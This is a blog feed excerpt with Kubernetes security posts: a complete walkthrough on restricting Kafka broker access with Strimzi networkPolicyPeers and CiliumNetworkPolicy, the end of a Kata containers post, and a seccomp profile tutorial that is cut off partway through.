<p>This is not magic. It is just a shift in where the isolation boundary lives. Whether that tradeoff is worth it depends on your environment. If you are running untrusted workloads, multi-tenant systems, or anything where a container escape actually matters, it starts to look a lot more reasonable.</p>
<p>If nothing else, it is worth running this yourself. Not reading the docs. Not trusting a diagram. Actually running it and seeing what changes. Because once you see it fail in one runtime and stop in another, the difference is no longer theoretical.</p>
<p>This was a light look at Kata containers and isolation. Not to fear, more to come.</p>
]]></content:encoded></item><item><title><![CDATA[Kafka on Kubernetes]]></title><description><![CDATA[Kafka is often treated as background infrastructure. It quietly moves events between services like payments, analytics, notifications, etc. So it easy to view it as internal plumbing.
But Kafka is not]]></description><link>https://cloudsecburrito.com/kafka-on-kubernetes</link><guid isPermaLink="true">https://cloudsecburrito.com/kafka-on-kubernetes</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[Security]]></category><category><![CDATA[kafka]]></category><category><![CDATA[networkpolicy]]></category><category><![CDATA[cilium]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Mon, 16 Mar 2026 21:06:30 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/68257779e3a1e2ca713dae3c/95a1ebc8-97d7-4523-a7d1-ac2fea67e7a8.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Kafka is often treated as background infrastructure. It quietly moves events between services like payments, analytics, notifications, etc. So it easy to view it as internal plumbing.</p>
<p>But Kafka is not just another service on the network.</p>
<p>If a workload can reach a Kafka broker, it may be able to read <strong>historical messages across entire topics</strong>. Those topics often contain operational data, user identifiers, or financial events that were never meant to be broadly accessible. The tricky part is that nothing breaks when this happens. Confidentiality failures in Kafka are usually silent. The system keeps running normally while data quietly flows somewhere it should not.</p>
<p>In Kubernetes environments this often starts with networking. By default, pods can communicate freely across namespaces, which means a compromised or misconfigured service may be able to connect to Kafka and consume data it was never meant to see.</p>
<p>In this post we will deploy a simple Kafka cluster with Strimzi, show how an unintended workload can read sensitive events, and then use <strong>networkPolicyPeers</strong> and <strong>Cilium network policy</strong> to enforce the architecture the platform actually intended. The goal is simple. Turn this:</p>
<pre><code class="language-plaintext">Any pod that can reach Kafka can read Kafka
</code></pre>
<p>into this:</p>
<pre><code class="language-plaintext">Only the workloads that should talk to Kafka can reach Kafka
</code></pre>
<p>If you are not familiar with Kafka, it helps to think of it as a distributed event log that services use to publish and consume messages. Producers write events to topics, and consumers read those events to process work or trigger downstream actions. If that model is new to you, it is worth taking a few minutes to read a quick Kafka introduction before continuing. Or what this <a href="https://www.youtube.com/watch?v=06iRM1Ghr1k&amp;t=30s">cool video</a> from Confluent.</p>
<hr />
<h2>Orientation Diagram</h2>
<p>Keep this diagram in mind.</p>
<img src="https://cdn.hashnode.com/uploads/covers/68257779e3a1e2ca713dae3c/5267bef9-9fe6-4eee-bdc2-0c690e88374e.png" alt="" style="display:block;margin:0 auto" />

<p>The architecture is straightforward. <code>payments-api</code> submits payment commands, <code>payments-worker</code> processes them, and Kafka moves the events between services. Workloads outside that flow should not be interacting with Kafka at all.</p>
<p>In theory that separation seems obvious, but Kubernetes does not enforce it by default. If a pod can reach Kafka, it can usually talk to it. The rest of this post walks through that behavior and then shows how <code>NetworkPolicy</code> can enforce the boundaries the platform actually intended.</p>
<hr />
<h2>The Architecture We Think We Built</h2>
<p>For this example we will model a simple event-driven payments system. Kafka runs in a dedicated namespace called <code>platform-data</code>. Application workloads live in their own namespaces and communicate with Kafka to produce or consume events.</p>
<p>Two services exist in the <code>payments</code> namespace:</p>
<ul>
<li><p><strong>payments-api</strong> Internet-facing service that receives payment requests. Its only responsibility is to produce messages to the <code>payments.commands</code> topic.</p>
</li>
<li><p><strong>payments-worker</strong> Internal service that processes those commands and produces results to <code>payments.events</code>.</p>
</li>
</ul>
<p>The system also contains an unrelated namespace:</p>
<ul>
<li><strong>analytics</strong> Batch jobs and internal tooling that should not interact with the payments pipeline at all.</li>
</ul>
<p>The Kafka topics look like this:</p>
<pre><code class="language-plaintext">payments.commands
payments.events
</code></pre>
<p>The intended architecture is straightforward.</p>
<pre><code class="language-plaintext">payments-api      → produce → payments.commands
payments-worker   → consume → payments.commands
payments-worker   → produce → payments.events
analytics         → no Kafka access
</code></pre>
<p>In other words, the API tier can submit payment requests, the worker tier processes them, and the resulting events are published for downstream consumers. Under this model, the <code>payments.events</code> topic may contain sensitive operational data such as payment identifiers, customer references, or transaction outcomes. Only trusted internal services should be able to read from it.</p>
<p>The assumption many teams make is that Kubernetes namespaces and service boundaries already enforce this separation.</p>
<hr />
<h2>Baseline Deployment</h2>
<p>To understand the problem, we will first deploy the architecture from the previous diagram. This section sets up a Kafka cluster, creates the payment topics, and deploys the example workloads. No network policy is applied yet.</p>
<p>The goal is simply to establish a working environment before we test how workloads interact with Kafka.</p>
<h3>Create Namespaces</h3>
<pre><code class="language-bash">kubectl create ns platform-data
kubectl create ns payments
kubectl create ns analytics
</code></pre>
<p><code>platform-data</code> will host Kafka, while application workloads live in their own namespaces.</p>
<h3>Install the Strimzi Operator</h3>
<pre><code class="language-bash">matt@ciliumcontrolplane:~/kafka$ kubectl apply -f 'https://strimzi.io/install/latest?namespace=platform-data' -n platform-data
clusterrole.rbac.authorization.k8s.io/strimzi-cluster-operator-leader-election created
deployment.apps/strimzi-cluster-operator created
customresourcedefinition.apiextensions.k8s.io/kafkanodepools.kafka.strimzi.io unchanged
clusterrole.rbac.authorization.k8s.io/strimzi-cluster-operator-global created
...
</code></pre>
<p>Strimzi manages the lifecycle of the Kafka cluster inside Kubernetes.</p>
<h3>Deploy Kafka</h3>
<p>Save the following as <code>kafka.yaml</code>.</p>
<pre><code class="language-yaml">apiVersion: kafka.strimzi.io/v1
kind: KafkaNodePool
metadata:
  name: demo-pool
  namespace: platform-data
  labels:
    strimzi.io/cluster: demo
spec:
  replicas: 3
  roles:
    - controller
    - broker
  storage:
    type: ephemeral
---
apiVersion: kafka.strimzi.io/v1
kind: Kafka
metadata:
  name: demo
  namespace: platform-data
spec:
  kafka:
    version: 4.1.1
    listeners:
      - name: plain
        port: 9092
        type: internal
        tls: false
    config:
      default.replication.factor: 3
      min.insync.replicas: 2
      offsets.topic.replication.factor: 3
      transaction.state.log.replication.factor: 3
      transaction.state.log.min.isr: 2
      inter.broker.protocol.version: "4.1"
</code></pre>
<p>This manifest deploys a small Kafka cluster using Strimzi. The <code>KafkaNodePool</code> defines three nodes that act as both controllers and brokers, which is enough to run a functional cluster for testing. Storage is configured as ephemeral since the goal of this environment is just demonstration.</p>
<p>The <code>Kafka</code> resource configures the broker itself. It exposes an internal listener on port 9092, disables TLS for simplicity, and sets the replication settings so topics can be replicated across the three brokers.</p>
<p>In short, this creates a minimal but fully functional Kafka cluster that other workloads in the cluster can connect to through the demo-kafka-bootstrap service.</p>
<pre><code class="language-bash">matt@ciliumcontrolplane:~/kafka$ kubectl apply -f kafka.yaml
kafkanodepool.kafka.strimzi.io/demo-pool created
kafka.kafka.strimzi.io/demo created
</code></pre>
<p>Verify the Kafka services:</p>
<pre><code class="language-bash">kubectl get svc -n platform-data | grep demo-kafka
</code></pre>
<h3>Create Kafka Topics</h3>
<p>Launch a temporary Kafka CLI pod:</p>
<pre><code class="language-bash">kubectl -n payments run kafka-toolbox   --image=quay.io/strimzi/kafka:0.40.0-kafka-3.7.0   --restart=Never   -- sleep 1d
</code></pre>
<p>This creates a temporary pod containing the Kafka CLI tools. The pod runs <code>sleep 1d</code> so it stays alive long enough for us to execute commands inside it with <code>kubectl exec</code>. We will use it to create topics and interact with the Kafka cluster from inside Kubernetes.</p>
<p>Create the topics used by the payments system. Kafka prints a warning about topic names containing . or _. This does not affect the topic itself. The topic is created successfully and can be used normally.</p>
<pre><code class="language-bash">kubectl -n payments exec -it kafka-toolbox -- /opt/kafka/bin/kafka-topics.sh --bootstrap-server demo-kafka-bootstrap.platform-data.svc:9092 --create --topic payments.commands --partitions 3 --replication-factor 3
</code></pre>
<pre><code class="language-bash">kubectl -n payments exec -it kafka-toolbox -- /opt/kafka/bin/kafka-topics.sh --bootstrap-server demo-kafka-bootstrap.platform-data.svc:9092 --create --topic payments.events --partitions 3 --replication-factor 3
</code></pre>
<p>These commands create the two topics used by the payment system. <code>payments.commands</code> will carry incoming payment requests, while <code>payments.events</code> will contain the resulting payment outcomes. Each topic is created with three partitions and a replication factor of three so the data is distributed across the Kafka brokers.</p>
<h3>Deploy the Example Workloads</h3>
<p>Create two simple pods representing the application services.</p>
<h4>payments-api</h4>
<pre><code class="language-bash">kubectl -n payments run payments-api   --labels app=payments-api   --image=quay.io/strimzi/kafka:0.40.0-kafka-3.7.0   --restart=Never   -- sleep 1d
</code></pre>
<h4>payments-worker</h4>
<pre><code class="language-bash">kubectl -n payments run payments-worker   --labels app=payments-worker   --image=quay.io/strimzi/kafka:0.40.0-kafka-3.7.0   --restart=Never   -- sleep 1d
</code></pre>
<p>These pods simply provide access to the Kafka CLI tools so we can simulate application behavior.</p>
<hr />
<h2>Testing Kafka Access</h2>
<p>Now that the environment is deployed, we can test how workloads interact with Kafka.</p>
<h3>Generate Payment Events</h3>
<p>From the worker pod:</p>
<pre><code class="language-bash">kubectl -n payments exec -it payments-worker -- bash -lc 'for i in {1..5}; do echo "{\"payment_id\":\"p-\(i\",\"status\":\"APPROVED\",\"customer\":\"cust-\)i\",\"amount\":$((i*10))}" done | /opt/kafka/bin/kafka-console-producer.sh --bootstrap-server demo-kafka-bootstrap.platform-data.svc:9092 --topic payments.events'
</code></pre>
<p>This command generates a few sample payment events and sends them to the <code>payments.events</code> topic using the Kafka console producer.</p>
<h3>Intended Read</h3>
<p>The worker should be able to read the events it produces.</p>
<pre><code class="language-bash">matt@ciliumcontrolplane:~/kafka$ kubectl -n payments exec -it payments-worker -- /opt/kafka/bin/kafka-console-consumer.sh --bootstrap-server demo-kafka-bootstrap.platform-data.svc:9092 --topic payments.events --from-beginning --timeout-ms 8000
{"payment_id":"p-1","status":"APPROVED","customer":"cust-1","amount":10}
{"payment_id":"p-2","status":"APPROVED","customer":"cust-2","amount":20}
{"payment_id":"p-3","status":"APPROVED","customer":"cust-3","amount":30}
{"payment_id":"p-4","status":"APPROVED","customer":"cust-4","amount":40}
{"payment_id":"p-5","status":"APPROVED","customer":"cust-5","amount":50}
Processed a total of 5 messages
</code></pre>
<p>This succeeds as expected.</p>
<h3>Unintended Read</h3>
<p>Now run the same command from <code>payments-api</code>.</p>
<pre><code class="language-bash">matt@ciliumcontrolplane:~/kafka$ kubectl -n payments exec -it payments-api -- /opt/kafka/bin/kafka-console-consumer.sh --bootstrap-server demo-kafka-bootstrap.platform-data.svc:9092 --topic payments.events --from-beginning --timeout-ms 8000
{"payment_id":"p-1","status":"APPROVED","customer":"cust-1","amount":10}
{"payment_id":"p-2","status":"APPROVED","customer":"cust-2","amount":20}
{"payment_id":"p-3","status":"APPROVED","customer":"cust-3","amount":30}
{"payment_id":"p-4","status":"APPROVED","customer":"cust-4","amount":40}
{"payment_id":"p-5","status":"APPROVED","customer":"cust-5","amount":50}
Processed a total of 5 messages
</code></pre>
<p>This works because nothing in the cluster currently limits which pods can reach Kafka. The <code>payments-api</code> pod can connect to the same broker service as <code>payments-worker</code>, and Kafka does not distinguish between them in this demo. As long as a pod can reach the broker, it can consume the topic.</p>
<h3>Cross Namespace Access</h3>
<p>Even unrelated workloads can reach Kafka.</p>
<pre><code class="language-bash">kubectl -n analytics run analytics-random   --image=quay.io/strimzi/kafka:0.40.0-kafka-3.7.0   --restart=Never   -- sleep 1d
</code></pre>
<p>Then consume events:</p>
<pre><code class="language-bash">matt@ciliumcontrolplane:~/kafka$ kubectl -n analytics exec -it analytics-random -- /opt/kafka/bin/kafka-console-consumer.sh --bootstrap-server demo-kafka-bootstrap.platform-data.svc:9092 --topic payments.events --from-beginning --timeout-ms 8000
{"payment_id":"p-1","status":"APPROVED","customer":"cust-1","amount":10}
{"payment_id":"p-2","status":"APPROVED","customer":"cust-2","amount":20}
{"payment_id":"p-3","status":"APPROVED","customer":"cust-3","amount":30}
{"payment_id":"p-4","status":"APPROVED","customer":"cust-4","amount":40}
{"payment_id":"p-5","status":"APPROVED","customer":"cust-5","amount":50}
Processed a total of 5 messages
</code></pre>
<hr />
<h2>Restricting Kafka Access with Strimzi Network Peers</h2>
<p>So how can we make this a bit safer? The first improvement is to restrict which workloads can reach the Kafka listener at all.</p>
<p>Strimzi can generate a Kubernetes <code>NetworkPolicy</code> for Kafka listeners directly from the Kafka resource definition. Taking a look we can see what it created.</p>
<pre><code class="language-bash">matt@ciliumcontrolplane:~/kafka$ kubectl get netpol -A
NAMESPACE       NAME                        POD-SELECTOR                                                               AGE
platform-data   demo-network-policy-kafka   strimzi.io/cluster=demo,strimzi.io/kind=Kafka,strimzi.io/name=demo-kafka   115m
</code></pre>
<p>Oddly enough we never did anything to create this. So what if we want to change this? You can do that through the <code>networkPolicyPeers</code> field on the listener configuration. Instead of leaving the listener open to the entire cluster, we can limit which namespaces or pods are allowed to connect to the broker port.</p>
<p>Below is a simplified example restricting access to the <code>payments</code> namespace.</p>
<pre><code class="language-yaml">listeners:
  - name: plain
    port: 9092
    type: internal
    tls: false
    networkPolicyPeers:
      - namespaceSelector:
          matchLabels:
            kubernetes.io/metadata.name: payments
</code></pre>
<p>When this configuration is applied, Strimzi generates a Kubernetes <code>NetworkPolicy</code> that allows connections to the Kafka listener only from workloads in the <code>payments</code> namespace.</p>
<p>So once we've applied let's try one inside the namespace and one outside as before.</p>
<p>Works:</p>
<pre><code class="language-bash">matt@ciliumcontrolplane:~/kafka$ kubectl -n payments exec -it payments-worker -- /opt/kafka/bin/kafka-console-consumer.sh --bootstrap-server demo-kafka-bootstrap.platform-data.svc:9092 --topic payments.events --from-beginning --timeout-ms 8000
{"payment_id":"p-1","status":"APPROVED","customer":"cust-1","amount":10}
{"payment_id":"p-2","status":"APPROVED","customer":"cust-2","amount":20}
{"payment_id":"p-3","status":"APPROVED","customer":"cust-3","amount":30}
{"payment_id":"p-4","status":"APPROVED","customer":"cust-4","amount":40}
{"payment_id":"p-5","status":"APPROVED","customer":"cust-5","amount":50}
Processed a total of 5 messages
</code></pre>
<p>Doesn't Work:</p>
<pre><code class="language-bash">matt@ciliumcontrolplane:~/kafka$ kubectl -n analytics exec -it analytics-random -- /opt/kafka/bin/kafka-console-consumer.sh --bootstrap-server demo-kafka-bootstrap.platform-data.svc:9092 --topic payments.events --from-beginning --timeout-ms 8000
Processed a total of 0 messages
</code></pre>
<p>That is great, but it would probably be easier to manage it outside using your ordinary <code>NetworkPolicy</code> or <code>CiliumNetworkPolicy</code>. But how can we do that if we really have no choice in either a default <code>NetworkPolicy</code> or a custom <code>NetworkPolicy</code> being created.</p>
<hr />
<h2>Bring Your Own NetworkPolicy</h2>
<p>Restricting the Kafka listener with Strimzi <code>networkPolicyPeers</code> works, but it also introduces another layer of policy management that may not always be desirable.</p>
<p>Instead, we can allow Strimzi to generate its listener policy while making it effectively match no real workloads. This keeps the listener closed by default and lets us explicitly manage access using our own network policies.</p>
<p>One simple way to do this is to configure the listener peers so they match a namespace that does not exist.</p>
<pre><code class="language-yaml">listeners:
  - name: plain
    port: 9092
    type: internal
    tls: false
    networkPolicyPeers:
      - namespaceSelector:
          matchLabels:
            kubernetes.io/metadata.name: neverusedns
</code></pre>
<p>With this configuration, the Strimzi-generated NetworkPolicy no longer matches real client pods. The Kafka listener is effectively closed to normal workloads.</p>
<p>From there, we can explicitly allow the intended clients using a Cilium network policy.</p>
<pre><code class="language-yaml">apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
  name: kafka-worker-only
  namespace: platform-data
spec:
  endpointSelector:
    matchLabels:
      k8s:app.kubernetes.io/instance: demo
      k8s:io.kubernetes.pod.namespace: platform-data
  ingress:
    - fromEndpoints:
        - matchLabels:
            k8s:app: payments-worker
            k8s:io.kubernetes.pod.namespace: payments
      toPorts:
        - ports:
            - port: "9092"
              protocol: TCP
</code></pre>
<p>This policy selects the Kafka broker pods in the <code>platform-data</code> namespace and allows inbound traffic to port <code>9092</code> only from pods labeled <code>app=payments-worker</code> in the <code>payments</code> namespace.</p>
<hr />
<h2>Wrap Up</h2>
<p>This exercise originally started while experimenting with a Kafka-aware Cilium feature that is now being deprecated. While that path turned out to be a dead end, it ended up being a useful way to explore how network policy actually behaves in a real Kubernetes use case.</p>
<p>What the experiment ultimately showed is that network policy is very good at shrinking the <strong>trust boundary</strong>, but it cannot eliminate trust entirely.</p>
<p>In our case we moved through three stages:</p>
<ul>
<li><p>Default Kubernetes networking where any pod could reach Kafka</p>
</li>
<li><p>Restricting listener access with Strimzi <code>networkPolicyPeers</code></p>
</li>
<li><p>Explicitly allowing only the required workload using a Cilium policy for ease of management</p>
</li>
</ul>
<p>Each step reduced the blast radius. Instead of trusting the entire cluster, we narrowed the boundary to a specific application, and finally to a specific workload.</p>
<p>But some trust still remains. If both a producer and consumer legitimately need to reach Kafka, the network layer alone cannot perfectly distinguish their roles. At some point the system must trust that the service behaves the way the architecture intends.</p>
<p>Security controls rarely eliminate trust boundaries, but they do <strong>make them smaller and more explicit</strong>.</p>
<p>In this example, the goal was not to achieve perfect isolation. It was to turn a flat cluster network where <em>any pod could read Kafka</em> into a system where <strong>only the workloads that should talk to Kafka can reach it at all</strong>.</p>
]]></content:encoded></item><item><title><![CDATA[Seccomp in Kubernetes]]></title><description><![CDATA[In Part 1, we stayed close to the kernel.
We watched a process call uname(), attach a seccomp filter, and then get shut down at the syscall boundary. No permissions debate. No LSM policy. No capability check. The kernel simply said: that syscall does...]]></description><link>https://cloudsecburrito.com/seccomp-in-kubernetes</link><guid isPermaLink="true">https://cloudsecburrito.com/seccomp-in-kubernetes</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[Seccomp]]></category><category><![CDATA[Security]]></category><category><![CDATA[Linux]]></category><category><![CDATA[Kubernetes Security]]></category><category><![CDATA[runtime]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Mon, 16 Feb 2026 22:00:14 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1771198527450/202ca71b-96d2-4d0e-a6fb-3f5be8f7b658.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>In <a target="_blank" href="https://cloudsecburrito.com/seccomp-the-syscall-firewall">Part 1</a>, we stayed close to the kernel.</p>
<p>We watched a process call <code>uname()</code>, attach a seccomp filter, and then get shut down at the syscall boundary. No permissions debate. No LSM policy. No capability check. The kernel simply said: that syscall does not exist for you anymore.</p>
<p>Clean. Brutal.</p>
<p>But what about the Kubernetes part? You're probably already running seccomp.</p>
<p>Not because you enabled it. Not because you wrote a profile. And definitely not because you tuned it.</p>
<p>You're running it because your container runtime turned it on for you. When a container starts, the application doesn’t install a seccomp filter. The container runtime does. Docker, containerd, etc. attach a default profile before your code ever runs. Kubernetes doesn’t enforce syscalls. It simply tells the runtime which profile to use. The actual enforcement still happens at the same kernel boundary we saw in Part 1. And once seccomp moves from "toy C demo" to "running cluster," the questions change.</p>
<p>Not the stuff we know:</p>
<ul>
<li><p>What is a syscall?</p>
</li>
<li><p>How does BPF work?</p>
</li>
</ul>
<p>But:</p>
<ul>
<li><p>What profile is actually active on my pods?</p>
</li>
<li><p>What does it allow?</p>
</li>
<li><p>And what happens if I turn it off?</p>
</li>
</ul>
<p>That’s where we’re going.</p>
<hr />
<h2 id="heading-orientation-diagram">Orientation Diagram</h2>
<p>Keep this diagram in mind.</p>
<p>Everything in this post is about how a seccomp profile defined in a Pod spec ends up enforced inside the kernel. Kubernetes selects the profile. The container runtime attaches it. The kernel evaluates every syscall against it.</p>
<p>The enforcement point hasn’t moved. It’s still the syscall boundary we explored in Part 1. What’s changed is the plumbing that decides which filter gets there.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1771198200512/b1580a7c-0597-4324-a66b-627d5a6e83e4.png" alt class="image--center mx-auto" /></p>
<hr />
<h2 id="heading-the-most-common-case-nothing-configured">The Most Common Case: Nothing Configured</h2>
<p>In many clusters, pods don’t specify a seccomp profile at all.</p>
<p>The pod spec is silent.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">apps/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Deployment</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-literal">no</span><span class="hljs-string">-seccomp</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">replicas:</span> <span class="hljs-number">1</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">app:</span> <span class="hljs-literal">no</span><span class="hljs-string">-seccomp</span>
  <span class="hljs-attr">template:</span>
    <span class="hljs-attr">metadata:</span>
      <span class="hljs-attr">labels:</span>
        <span class="hljs-attr">app:</span> <span class="hljs-literal">no</span><span class="hljs-string">-seccomp</span>
    <span class="hljs-attr">spec:</span>
      <span class="hljs-attr">containers:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">nginx</span>
          <span class="hljs-attr">image:</span> <span class="hljs-string">nginx</span>
</code></pre>
<p>It’s simply not present. So what happens? It will run completely unconfined. Create this deployment and check inside the container.</p>
<pre><code class="lang-bash">matt@cp:~/seccomp$ kubectl <span class="hljs-built_in">exec</span> no-seccomp-75d54c6445-s7ln8 -- grep Seccomp /proc/1/status
Seccomp:    0
Seccomp_filters:    0
</code></pre>
<p>We can see <code>Seccomp: 0</code>, which of course means no seccomp.</p>
<hr />
<h2 id="heading-a-simple-way-to-see-seccomp-in-action">A Simple Way to See Seccomp in Action</h2>
<p>One syscall commonly blocked by the runtime’s default seccomp profile is <code>keyctl</code>.</p>
<p><code>keyctl</code> interacts with the Linux kernel keyring subsystem. Most containers don’t need to manage kernel keyrings, so the default profile blocks it as unnecessary attack surface.</p>
<p>If you’re using the basic Nginx image, you can install a small test tool:</p>
<pre><code class="lang-bash">matt@cp:~$ kubectl <span class="hljs-built_in">exec</span> -it no-seccomp-75d54c6445-s7ln8 -- /bin/bash
root@no-seccomp-75d54c6445-s7ln8:/<span class="hljs-comment"># apt-get update &amp;&amp; apt-get install -y keyutils</span>
</code></pre>
<p>Then run:</p>
<pre><code class="lang-bash">root@no-seccomp-75d54c6445-s7ln8:/<span class="hljs-comment"># keyctl show</span>
Session Keyring
 857262715 --alswrv      0     0  keyring: ...
</code></pre>
<p>As we would expect.</p>
<p>Now why this example? The kernel keyring subsystem stores sensitive material such as session keys. Direct interaction with kernel-managed key storage is not something typical application containers need.</p>
<p>From an attacker’s perspective, however, kernel keyrings can become part of privesc and more.</p>
<p>Blocking <code>keyctl</code> removes that entire class of risk (sound familiar?). That’s the core idea behind seccomp: if the workload doesn’t need it, the syscall doesn’t exist.</p>
<hr />
<h2 id="heading-runtimedefault-making-the-baseline-explicit">RuntimeDefault: Making the Baseline Explicit</h2>
<p>Instead of relying on cluster defaults (aka nothing), you can declare your intent directly. Let's give it a shot in a new deployment.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">apps/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Deployment</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-literal">yes</span><span class="hljs-string">-seccomp</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">replicas:</span> <span class="hljs-number">1</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">app:</span> <span class="hljs-literal">yes</span><span class="hljs-string">-seccomp</span>
  <span class="hljs-attr">template:</span>
    <span class="hljs-attr">metadata:</span>
      <span class="hljs-attr">labels:</span>
        <span class="hljs-attr">app:</span> <span class="hljs-literal">yes</span><span class="hljs-string">-seccomp</span>
    <span class="hljs-attr">spec:</span>
      <span class="hljs-attr">containers:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">nginx</span>
          <span class="hljs-attr">image:</span> <span class="hljs-string">nginx</span>
          <span class="hljs-attr">imagePullPolicy:</span> <span class="hljs-string">IfNotPresent</span>
          <span class="hljs-attr">securityContext:</span>
            <span class="hljs-attr">seccompProfile:</span>
              <span class="hljs-attr">type:</span> <span class="hljs-string">RuntimeDefault</span>
</code></pre>
<p>This tells Kubernetes to use the default seccomp profile provided by the container runtime. The runtime attaches that profile before the container process starts. The kernel enforces it on every syscall. Just a filter at the syscall boundary.</p>
<p>Let's run the same exercise as before.</p>
<pre><code class="lang-bash">matt@cp:~$ kubectl <span class="hljs-built_in">exec</span> -it yes-seccomp-75d54c6445-s7ln8 -- /bin/bash
root@no-seccomp-75d54c6445-s7ln8:/<span class="hljs-comment"># apt-get update &amp;&amp; apt-get install -y keyutils</span>
</code></pre>
<p>Then run:</p>
<pre><code class="lang-bash">root@no-seccomp-75d54c6445-s7ln8:/<span class="hljs-comment"># keyctl show</span>
Session Keyring
Unable to dump key: Operation not permitted
</code></pre>
<p>Voila, syscall filtering at is finest. But what exactly is that filter?</p>
<hr />
<h2 id="heading-the-actual-runtimedefault-profile">The Actual RuntimeDefault Profile</h2>
<p>If you want to see what <code>RuntimeDefault</code> really means on <em>your</em> node (and why wouldn't you?), inspect the OCI runtime spec the container runtime handed to <code>runc</code>.</p>
<p>First, list running containers and grab a container ID:</p>
<pre><code class="lang-bash">matt@cp:~/seccomp$ sudo crictl ps | grep yes-seccomp
...
d7ebc42cadd5f       2af158aaca82b       14 minutes ago      Running             nginx                       0                   e3aa4f4782108       yes-seccomp-796856b464-hqq44               default
</code></pre>
<p>Now inspect the container and extract the exact seccomp configuration from the runtime spec:</p>
<pre><code class="lang-bash">matt@cp:~/seccomp$ sudo crictl inspect d7ebc42cadd5f | jq <span class="hljs-string">'.info.runtimeSpec.linux.seccomp'</span>
</code></pre>
<p>If seccomp is enabled, you’ll see something like:</p>
<pre><code class="lang-json">{
  <span class="hljs-attr">"architectures"</span>: [
    <span class="hljs-string">"SCMP_ARCH_ARM"</span>,
    <span class="hljs-string">"SCMP_ARCH_AARCH64"</span>
  ],
  <span class="hljs-attr">"defaultAction"</span>: <span class="hljs-string">"SCMP_ACT_ERRNO"</span>,
  <span class="hljs-attr">"syscalls"</span>: [
    {
      <span class="hljs-attr">"action"</span>: <span class="hljs-string">"SCMP_ACT_ALLOW"</span>,
      <span class="hljs-attr">"names"</span>: [
        <span class="hljs-string">"accept"</span>,
        <span class="hljs-string">"accept4"</span>,
...
          <span class="hljs-string">"op"</span>: <span class="hljs-string">"SCMP_CMP_MASKED_EQ"</span>,
          <span class="hljs-string">"value"</span>: <span class="hljs-number">2114060288</span>
        }
      ],
      <span class="hljs-attr">"names"</span>: [
        <span class="hljs-string">"clone"</span>
      ]
    },
    {
      <span class="hljs-attr">"action"</span>: <span class="hljs-string">"SCMP_ACT_ERRNO"</span>,
      <span class="hljs-attr">"errnoRet"</span>: <span class="hljs-number">38</span>,
      <span class="hljs-attr">"names"</span>: [
        <span class="hljs-string">"clone3"</span>
      ]
    }
  ]
}
</code></pre>
<p>This is the actual seccomp profile applied to the container. And it is easy to see what is explicitly allowed by looking at the names of syscalls under <code>SCMP_ACT_ALLOW</code>.</p>
<p>And if you actually want to see how many syscalls are allowed, it is easy to take a look.</p>
<pre><code class="lang-bash">matt@cp:~/seccomp$ sudo crictl inspect d7ebc42cadd5f | jq <span class="hljs-string">'
  .info.runtimeSpec.linux.seccomp.syscalls
  | map(.names) | add
  | unique
  | length
'</span>
...
377
</code></pre>
<hr />
<h2 id="heading-unconfined-and-privileged">Unconfined and Privileged</h2>
<p><code>RuntimeDefault</code> is a baseline. But it’s not guaranteed. In Kubernetes, seccomp can be explicitly disabled:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">securityContext:</span>
  <span class="hljs-attr">seccompProfile:</span>
    <span class="hljs-attr">type:</span> <span class="hljs-string">Unconfined</span>
</code></pre>
<p>That tells the runtime not to attach a seccomp filter at all. When that happens, the container process runs with full access to the kernel’s syscall surface (subject to capabilities and LSMs, but without syscall filtering).</p>
<p>Adjust the deployment with this new <code>securityContext</code> and you can verify it the same way as before:</p>
<pre><code class="lang-bash">matt@cp:~/seccomp$ kubectl <span class="hljs-built_in">exec</span> unconfined-seccomp-6489c66986-vslvv -- grep Seccomp /proc/1/status
Seccomp:    0
Seccomp_filters:    0
</code></pre>
<p>There’s another common way seccomp effectively disappears: privileged containers. When a container runs privileged, it is granted elevated access to the host.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">securityContext:</span>
  <span class="hljs-attr">privileged:</span> <span class="hljs-literal">true</span>
  <span class="hljs-attr">seccompProfile:</span>
    <span class="hljs-attr">type:</span> <span class="hljs-string">RuntimeDefault</span>
</code></pre>
<p>Adjust the deployment with this new <code>securityContext</code> and you can verify it the same way as before:</p>
<pre><code class="lang-bash">matt@cp:~/seccomp$ kubectl <span class="hljs-built_in">exec</span> priv-seccomp-57778f5d79-zdm9x -- grep Seccomp /proc/1/status
Seccomp:    0
Seccomp_filters:    0
</code></pre>
<p>As you can see, privileged wiped out the intent of the <code>seccompProfile</code>. User beware.</p>
<hr />
<h2 id="heading-making-seccomp-the-default-kubeadm">Making Seccomp the Default (kubeadm)</h2>
<p>Declaring <code>RuntimeDefault</code> in every pod spec works. But there's another way! You can read it in the CIS Kubernetes Benchmark under 4.2.14.</p>
<p>Modern Kubernetes supports making the runtime’s default seccomp profile the automatic baseline for all pods that don’t explicitly specify one. On kubeadm clusters, this is controlled by the kubelet.</p>
<p>You want:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">seccompDefault:</span> <span class="hljs-literal">true</span>
</code></pre>
